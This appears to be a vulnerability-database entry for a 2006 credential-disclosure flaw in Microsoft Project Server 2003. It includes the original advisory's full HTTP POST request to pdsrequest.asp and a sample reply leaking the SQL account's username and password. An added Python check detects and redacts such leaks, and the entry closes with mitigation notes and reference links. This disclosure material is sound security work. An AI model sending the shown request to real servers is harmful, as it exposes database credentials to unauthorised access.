Microsoft Project Server 2003 'PDSRequest.ASP' XML Request Information Disclosure Vulnerability

Vulnerability ID: 1192441    Vulnerability type: Design error
Published: 2006-12-18    Updated: 2006-12-18
CVE: CVE-2006-6617    CNNVD-ID: CNNVD-200612-390
Platform: N/A    CVSS score: 6.5
|Vulnerability sources
https://cxsecurity.com/issue/WLB-2006120115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-390
|Vulnerability details
The page projectserver/logon/pdsrequest.asp in Microsoft Project Server 2003 has an information disclosure vulnerability. A remote authenticated user can obtain the MSProjectUser password for the SQL database through a GetInitializationData request (the information is contained in the UserName and Password tags of the response).
|Vulnerability exploit (EXP)
==============================================================
% Project Server 2003 - Credential Disclosure
% brett.moore (at) security-assessment (dot) com [email concealed]
==============================================================

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server over HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--------------------------------------------------------------
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=<valid cookie>

<Request>
<GetInitializationData>
<Release>1</Release>
</GetInitializationData>
</Request>

<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName>              <----
<Password>sekretpass</Password>                 <----
<UserNTAccount>SERVERUSER</UserNTAccount>
</GetLoginInformation>
</Reply>
--------------------------------------------------------------

Some quick notes that mitigate this attack:
* The cookie must be a valid cookie, which is obtained via a 
  login with a valid username and password.
* Since the thick client is 'client side' any sql can be 
  manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also 
  be able to be made through this method.

==============================================================
% 
==============================================================
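A defender-side check, added here as an example and not part of the advisory or of Microsoft's code: it parses a captured GetInitializationData reply (a constructed sample modelled on the transcript above, with the closing tag the transcript omits) and reports whether GetLoginInformation carries SQL login material, so an administrator can confirm exposure from a proxy capture and redact the sample before filing it. The function names are my own.

```python
import xml.etree.ElementTree as ET
from typing import Optional

# Constructed sample of a GetInitializationData reply, modelled on the
# advisory's transcript. The transcript omits the closing
# </GetInitializationData> tag; a well-formed reply is assumed here.
SAMPLE_REPLY = """<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<UserName>MSProjectUser</UserName>
<Password>sekretpass</Password>
<UserNTAccount>SERVERUSER</UserNTAccount>
</GetLoginInformation>
</GetInitializationData>
</Reply>"""


def find_leaked_db_credentials(reply_xml: str) -> Optional[dict]:
    """Report SQL login material carried in GetLoginInformation, or None.
    The password value itself is never returned, only whether it is set."""
    try:
        root = ET.fromstring(reply_xml)
    except ET.ParseError:  # truncated or non-XML capture
        return None
    info = root.find("./GetInitializationData/GetLoginInformation")
    if root.tag != "Reply" or info is None:
        return None
    password = info.findtext("Password")
    if password is None:
        return None
    return {
        "server": info.findtext("SVR", ""),
        "db": info.findtext("DB", ""),
        "user": info.findtext("UserName", ""),
        "password_present": password != "",
    }


def redact_login_information(reply_xml: str) -> str:
    """Mask the Password text so a captured reply can be stored safely."""
    root = ET.fromstring(reply_xml)
    for node in root.iter("Password"):
        if node.text:
            node.text = "***REDACTED***"
    return ET.tostring(root, encoding="unicode")
```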
|References

Source: BID
Name: 21611
Link: http://www.securityfocus.com/bid/21611
Source: BUGTRAQ
Name: 20061214 Project Server 2003 - Credential Disclosure
Link: http://www.securityfocus.com/archive/1/archive/1/454497/100/0/threaded
Source: XF
Name: projectserver-pdsrequest-info-disclosure(30905)
Link: http://xforce.iss.net/xforce/xfdb/30905
Source: VUPEN
Name: ADV-2006-5038
Link: http://www.frsirt.com/english/advisories/2006/5038
Source: SECTRACK
Name: 1017388
Link: http://securitytracker.com/id?1017388
Source: SREASON
Name: 2047
Link: http://securityreason.com/securityalert/2047
Source: SECUNIA
Name: 23391
Link: http://secunia.com/advisories/23391
Source: FULLDISC
Name: 20061214 Project Server 2003 - Credential Disclosure
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051316.html